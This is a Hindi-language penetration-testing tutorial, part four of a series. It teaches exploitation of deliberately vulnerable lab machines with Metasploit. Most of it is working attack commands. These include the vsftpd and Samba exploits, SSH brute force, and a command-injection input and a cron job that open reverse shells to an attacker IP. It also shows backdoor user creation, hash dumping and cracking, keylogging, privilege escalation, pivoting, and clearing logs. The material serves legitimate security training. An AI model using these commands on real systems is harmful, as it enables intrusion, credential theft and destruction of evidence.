एक्सप्लॉयटेशन: भेद्यता से शेल तक

हैकर का रास्ता: 5 भागों की श्रृंखला

भाग 1: परिचय → भाग 2: Flipper में महारत → भाग 3: Kali की बुनियादी बातें → भाग 4: Exploitation → भाग 5: पूर्ण ऑडिट

भाग 1-3 में, आपने अपना टूलकिट बनाया। आप बैज क्लोन कर सकते हैं, नेटवर्क मैप कर सकते हैं, handshake कैप्चर कर सकते हैं, और किसी लक्ष्य पर चल रही हर सेवा की पहचान कर सकते हैं। अब आपको हर जगह कमज़ोरियाँ दिखती हैं। लेकिन कमज़ोरी देखना और उसका फ़ायदा उठाना बहुत अलग कौशल हैं।

यहीं से चीज़ें असली हो जाती हैं। आज आप Metasploit Framework का उपयोग करना सीखेंगे, वही टूल जो दुनिया भर के पेशेवर penetration tester इस्तेमाल करते हैं। आप अपनी पहली कमज़ोरी का फ़ायदा उठाएंगे, persistence स्थापित करेंगे, विशेषाधिकार बढ़ाएंगे, और नेटवर्क के ज़रिए pivot करना सीखेंगे।

भाग 1: अपनी अटैक लैब बनाना

किसी भी चीज़ का exploitation करने से पहले, आपको लक्ष्य चाहिए। असली penetration tester जानबूझकर कमज़ोर मशीनों के साथ अलग लैब वातावरण का उपयोग करते हैं। आप भी यही करेंगे।

आवश्यक लैब सेटअप

आपको क्या चाहिए

• Kali Linux VM - आपकी अटैक मशीन (भाग 3 से)
• Metasploitable 2 - जानबूझकर कमज़ोर Linux VM (SourceForge)
• Metasploitable 3 - कमज़ोर Windows/Linux VM (GitHub)
• DVWA - Damn Vulnerable Web Application (GitHub)
• VulnHub VMs - CTF-स्टाइल कमज़ोर मशीनें (vulnhub.com)

प्रोजेक्ट: लैब नेटवर्क सेटअप

समय: 45 मिनट

1. SourceForge से Metasploitable 2 डाउनलोड करें
2. VirtualBox/VMware में इम्पोर्ट करें
3. नेटवर्क कॉन्फ़िगर करें: Kali और Metasploitable दोनों को "Host-Only" या "Internal Network" पर सेट करें
4. Metasploitable बूट करें (डिफ़ॉल्ट लॉगिन: msfadmin / msfadmin)
5. IP पता नोट करें: ifconfig
6. Kali से, कनेक्टिविटी सत्यापित करें: ping METASPLOITABLE_IP
7. प्रारंभिक स्कैन चलाएं: sudo nmap -sV -sC METASPLOITABLE_IP

सत्यापन: आपको दर्जनों खुले पोर्ट दिखने चाहिए। Metasploitable को हैक होने के लिए डिज़ाइन किया गया है।

Metasploitable का आपका nmap स्कैन FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, और अन्य जैसी सेवाओं को प्रकट करेगा, जिनमें से कई पुराने, कमज़ोर संस्करण चला रहे हैं। यह आपका खेल का मैदान है।

भाग 2: Metasploit Framework की बुनियादी बातें

Metasploit सिर्फ़ एक टूल नहीं है। यह एक पूरा इकोसिस्टम है। इसमें हज़ारों exploits, payloads, सहायक modules, और post-exploitation टूल्स हैं। इसकी संरचना को समझना आवश्यक है।

Metasploit शुरू करना

bash# Initialize the database (first time only)
sudo msfdb init

# Start Metasploit console
msfconsole

# You'll see the Metasploit banner and prompt:
msf6 >

Metasploit की संरचना

Metasploit सब कुछ modules में व्यवस्थित करता है:

• Exploits - कोड जो कमज़ोरियों का फ़ायदा उठाता है
• Payloads - कोड जो exploitation के बाद चलता है (shells, meterpreter)
• Auxiliary - स्कैनर, fuzzers, और अन्य उपयोगिताएं
• Post - persistence, pivoting के लिए post-exploitation modules
• Encoders - पहचान से बचने के लिए payloads को अस्पष्ट करना

bash# Search for modules
msf6 > search type:exploit platform:linux smb

# Search by CVE
msf6 > search cve:2017-0144

# Search by name
msf6 > search vsftpd

# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Exploitation का वर्कफ़्लो

हर Metasploit exploitation एक ही पैटर्न का पालन करता है:

1. एक exploit चुनें - use exploit/path/to/module
2. विकल्प सेट करें - लक्ष्य IP, पोर्ट, credentials
3. एक payload चुनें - exploitation के बाद क्या चलेगा
4. निष्पादित करें - exploit या run

भाग 3: आपका पहला Exploit

चलिए इतिहास के सबसे प्रसिद्ध backdoors में से एक का फ़ायदा उठाते हैं: vsftpd 2.3.4 backdoor। 2011 में, किसी ने vsftpd सोर्स कोड में एक backdoor डाला। अगर आप :) से समाप्त होने वाला username भेजते हैं, तो पोर्ट 6200 पर एक shell खुलता है।

Metasploitable 2 बिल्कुल यही संस्करण चलाता है।

bash# Start Metasploit
msfconsole

# Search for the exploit
msf6 > search vsftpd

# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101

# Run the exploit
msf6 exploit(...) > exploit

# If successful:
[*] Command shell session 1 opened
[+] Got shell!

# You now have a root shell on the target
whoami
root
id
uid=0(root) gid=0(root)

बस इतना ही। एक कमज़ोर सेवा, एक exploit, root एक्सेस। इसीलिए सॉफ़्टवेयर अपडेट रखना ज़रूरी है।

प्रोजेक्ट: vsftpd Backdoor का Exploit

समय: 15 मिनट

पूर्वापेक्षाएं: Metasploitable 2 चल रहा हो, Kali उसी नेटवर्क पर हो

1. सत्यापित करें कि FTP चल रहा है: nmap -sV -p 21 TARGET_IP
2. msfconsole लॉन्च करें
3. vsftpd exploit खोजें, चुनें और कॉन्फ़िगर करें
4. Exploit चलाएं
5. Shell मिलने पर, खोजें: cat /etc/shadow

सफलता का मापदंड: आप /etc/shadow पढ़ सकते हैं, जिसे केवल root एक्सेस कर सकता है।

भाग 4: Payloads को समझना

Payload वह है जो exploit सफल होने के बाद चलता है। ऊपर जो बुनियादी shell हमें मिला वह सरल है, लेकिन Metasploit बहुत अधिक शक्तिशाली विकल्प प्रदान करता है।

Payload के प्रकार

• Singles - स्वयंपूर्ण, एक बार के payloads (उपयोगकर्ता जोड़ना, कमांड चलाना)
• Stagers - छोटे payloads जो कनेक्शन स्थापित करते हैं, फिर मुख्य payload डाउनलोड करते हैं
• Stages - stager द्वारा डाउनलोड किया गया मुख्य payload (Meterpreter)

bash# List compatible payloads for current exploit
msf6 exploit(...) > show payloads

# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcp

Reverse बनाम Bind Shells

• Reverse shell - लक्ष्य आपसे वापस कनेक्ट होता है। Firewalls को बायपास करने के लिए बेहतर (आउटबाउंड आमतौर पर अनुमत)।
• Bind shell - लक्ष्य एक पोर्ट खोलता है जिससे आप कनेक्ट होते हैं। पहचानना आसान, अक्सर firewalls द्वारा ब्लॉक किया जाता है।

bash# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444

# Metasploit starts a listener automatically when you exploit

Meterpreter: सर्वोत्तम Payload

Meterpreter, Metasploit का सबसे शक्तिशाली payload है। यह पूरी तरह मेमोरी में चलता है (डिस्क पर कोई फ़ाइल नहीं), एन्क्रिप्टेड संचार प्रदान करता है, और post-exploitation के लिए दर्जनों बिल्ट-इन कमांड शामिल हैं।

bash# Meterpreter commands (once you have a session)
meterpreter > sysinfo          # System information
meterpreter > getuid           # Current user
meterpreter > pwd              # Current directory
meterpreter > ls               # List files
meterpreter > download file    # Download file to Kali
meterpreter > upload file      # Upload file to target
meterpreter > shell            # Drop to system shell
meterpreter > hashdump         # Dump password hashes
meterpreter > screenshot       # Take screenshot
meterpreter > keyscan_start    # Start keylogger
meterpreter > keyscan_dump     # Dump keystrokes
meterpreter > background       # Background this session

भाग 5: और Exploitation तकनीकें

Samba (SMB) का Exploitation

Metasploitable 2 Samba का एक कमज़ोर संस्करण चलाता है। यह WannaCry में उपयोग किए गए कुख्यात EternalBlue exploit के समान है।

bash# Search for Samba exploits
msf6 > search type:exploit samba

# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

कमज़ोर Credentials का Exploitation

हर हमले के लिए सॉफ़्टवेयर कमज़ोरी की ज़रूरत नहीं होती। कमज़ोर पासवर्ड हर जगह हैं।

bash# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run

# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

वेब एप्लिकेशन Exploitation

Metasploitable में कई कमज़ोर वेब एप्लिकेशन शामिल हैं। चलिए एक PHP code injection का फ़ायदा उठाते हैं।

bash# First, browse to http://TARGET/mutillidae/
# Find the "User Lookup" page (vulnerable to SQLi and code injection)

# Use Metasploit's web exploits
msf6 > search type:exploit php

# Or exploit manually with command injection:
# In vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444

प्रोजेक्ट: तीन अलग-अलग सेवाओं का Exploit

समय: 60 मिनट

लक्ष्य: Metasploitable 2

1. vsftpd backdoor (FTP - पोर्ट 21) का exploit करें और root shell प्राप्त करें
2. Samba usermap_script (SMB - पोर्ट 139/445) का exploit करें और root shell प्राप्त करें
3. auxiliary/scanner/ssh/ssh_login का उपयोग करके SSH credentials क्रैक करें
4. हर exploitation का दस्तावेज़ीकरण करें: उपयोग किया गया module, सेट किए गए विकल्प, परिणाम

बोनस: पोर्ट 80 पर वेब एप्लिकेशन की जांच करें और मैन्युअल exploitation वेक्टर खोजें।

भाग 6: Post-Exploitation

Shell मिलना बस शुरुआत है। असली penetration test में यह प्रदर्शित करना होता है कि एक हमलावर उस एक्सेस के साथ क्या कर सकता है। यह post-exploitation है।

जानकारी एकत्र करना

text# From a Meterpreter session
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux

# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arp

bash# From a regular shell
cat /etc/passwd       # All users
cat /etc/shadow       # Password hashes (requires root)
cat /etc/hosts        # Network mappings
netstat -tulpn        # Open ports
ps aux                # Running processes
crontab -l            # Scheduled tasks

Credential Harvesting

text# Dump password hashes
meterpreter > hashdump
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash

bash# Or from shell
cat /etc/shadow

# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Or hashcat (faster with GPU)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

Persistence स्थापित करना

Persistence का मतलब है रीबूट के बाद भी या जब आपका शुरुआती exploit वेक्टर पैच हो जाए तब भी एक्सेस बनाए रखना।

bash# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker

# Add SSH key for passwordless access
mkdir /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys

# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root

# Metasploit persistence module
meterpreter > run persistence -h
meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

Persistence = सबूत

हर persistence मैकेनिज़म निशान छोड़ता है। असली penetration test में, आप दस्तावेज़ करते हैं कि आप क्या कर सकते थे, फिर सफ़ाई करते हैं। क्लाइंट सिस्टम पर backdoors छोड़ना अव्यवसायिक और संभावित रूप से अवैध है। अपनी लैब में, मनमर्ज़ी करें, लेकिन परिणामों को समझें।

भाग 7: विशेषाधिकार वृद्धि

अक्सर आपको कम विशेषाधिकार वाले उपयोगकर्ता के रूप में शुरुआती एक्सेस मिलता है। परीक्षण उद्देश्यों को प्राप्त करने के लिए root/admin तक वृद्धि आमतौर पर आवश्यक है।

Linux विशेषाधिकार वृद्धि

bash# Current user context
id
whoami

# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# Sudo permissions
sudo -l

# Kernel version (for kernel exploits)
uname -a

# Running processes as root
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

स्वचालित Enumeration Scripts

• LinPEAS - github.com/carlospolop/PEASS-ng
• LinEnum - github.com/rebootuser/LinEnum
• linux-exploit-suggester - GitHub

bash# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000

# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitable

सामान्य Linux Privesc वेक्टर

bash# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell

# 2. SUID binary exploitation
# If /usr/bin/find has SUID bit:
find . -exec /bin/sh -p \;

# 3. Writable /etc/passwd
# Generate password hash:
openssl passwd -1 mypassword
# Add to /etc/passwd:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd

# 4. Cron job exploitation
# If a cron runs a writable script as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shell

Windows विशेषाधिकार वृद्धि

अगर आप Windows लक्ष्यों (Metasploitable 3) का परीक्षण कर रहे हैं, तो तकनीकें अलग हैं:

text# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user

meterpreter > getsystem
[+] ...got SYSTEM

# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester

# Or background and use specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploit

प्रोजेक्ट: उपयोगकर्ता से Root तक वृद्धि

समय: 45 मिनट

परिदृश्य: आपके पास Metasploitable पर msfadmin (non-root) के रूप में SSH एक्सेस है

1. Metasploitable पर SSH: ssh msfadmin@TARGET
2. पुष्टि करने के लिए id चलाएं कि आप root नहीं हैं
3. Sudo अनुमतियाँ जांचें: sudo -l
4. SUID binaries खोजें: find / -perm -4000 2>/dev/null
5. LinPEAS अपलोड करें और चलाएं
6. एक privesc वेक्टर पहचानें और उसका फ़ायदा उठाएं

लक्ष्य: नेटवर्क सेवा के exploitation के अलावा किसी और चीज़ का उपयोग करके root shell प्राप्त करें।

भाग 8: Pivoting

Pivoting एक हैक किए गए सिस्टम का उपयोग करके अन्य सिस्टम पर हमला करना है जो आपकी अटैक मशीन से सीधे पहुंच योग्य नहीं हैं। इसी तरह हमलावर नेटवर्क में लैटरली मूव करते हैं।

Pivot परिदृश्य

इस नेटवर्क की कल्पना करें:

• आपका Kali: 192.168.1.100
• हैक किया गया host: 192.168.1.50 (आंतरिक नेटवर्क 10.0.0.0/24 से भी जुड़ा)
• लक्ष्य: 10.0.0.10 (केवल 192.168.1.50 से पहुंच योग्य)

आप 10.0.0.10 तक सीधे नहीं पहुंच सकते। लेकिन हैक किए गए host के माध्यम से, आप पहुंच सकते हैं।

Metasploit Routing

text# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50

meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1

meterpreter > background

# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print

# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run

# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploit

पूर्ण एक्सेस के लिए SOCKS Proxy

bash# Set up a SOCKS proxy through Meterpreter
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run

# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080

# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
proxychains ssh [email protected]

SSH Tunneling (Metasploit के बिना)

bash# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host

# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80

# Remote port forwarding (expose your service to internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444

भाग 9: निशान मिटाना

पेशेवर penetration tester अपनी एक्सेस का दस्तावेज़ीकरण करते हैं लेकिन बाद में सफ़ाई करते हैं। यह समझना कि हमलावर कैसे निशान मिटाते हैं, घुसपैठ का पता लगाने में भी मदद करता है।

bash# Clear bash history
history -c
cat /dev/null > ~/.bash_history

# Clear auth logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/wtmp
echo "" > /var/log/btmp

# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log

# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file

# Meterpreter
meterpreter > clearev          # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"

असली कार्यों में: यह न करें

पेशेवर pentester अपनी एक्सेस का दस्तावेज़ीकरण करते हैं और अपने निष्कर्षों की रिपोर्ट करते हैं। वे उन्हें छुपाते नहीं। लॉग साफ़ करना उन सबूतों को नष्ट कर देता है जिनकी रक्षकों को हमले के रास्ते को समझने के लिए ज़रूरत होती है। इन तकनीकों का अभ्यास केवल अपने पृथक लैब वातावरण में करें।

हैकर का रास्ता

5 भागों की श्रृंखला जो आपको जिज्ञासु से सक्षम बनाती है।

भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियादी बातें भाग 4: Exploitation ✓ भाग 5: पूर्ण ऑडिट

भाग 4 चेकलिस्ट

☐ लैब सेटअप: Metasploitable 2 चल रहा, पृथक नेटवर्क कॉन्फ़िगर किया गया

☐ Metasploit: डेटाबेस आरंभ किया, बुनियादी नेविगेशन में महारत

☐ पहला Exploit: vsftpd backdoor का exploit किया, root shell प्राप्त किया

☐ कई वेक्टर: FTP, SMB exploit और SSH credentials क्रैक किए

☐ Post-Exploitation: Password hashes निकाले, सिस्टम की गणना की

☐ विशेषाधिकार वृद्धि: नेटवर्क exploit के बिना उपयोगकर्ता से root तक वृद्धि की

☐ Pivoting: autoroute और SOCKS proxy अवधारणाओं को समझा

☐ दस्तावेज़ीकरण: सभी exploits को चरणों और सबूतों के साथ दस्तावेज़ किया

आगे क्या है

आपने कमज़ोरियों का exploitation करना, विशेषाधिकार बढ़ाना, और नेटवर्क में pivot करना सीखा। आपने देखा कि कैसे एक कमज़ोरी कितनी तेज़ी से पूर्ण हमले में बदल जाती है। आप समझते हैं कि पेशेवर penetration tester क्या करते हैं।

भाग 5 में, हम सब कुछ एक साथ लाते हैं। आप शुरू से अंत तक एक पूर्ण सुरक्षा ऑडिट करेंगे:

• कार्यक्षेत्र और नियम
• पूर्ण reconnaissance कार्यप्रणाली
• व्यवस्थित exploitation
• व्यापक post-exploitation
• पेशेवर रिपोर्टिंग
• सुधार की सिफ़ारिशें

भाग 5 शिखर है। इस श्रृंखला में आपने जो कुछ सीखा वह एक वास्तविक दुनिया की कार्यप्रणाली में जुड़ता है जिसका उपयोग आप किसी भी अधिकृत नेटवर्क की सुरक्षा का मूल्यांकन करने के लिए कर सकते हैं।

आपने तकनीकें सीख लीं। अब आप कार्यप्रणाली सीखेंगे। भाग 5 कौशल को पूर्ण penetration testing वर्कफ़्लो में बदलता है।

भाग 5 में मिलते हैं।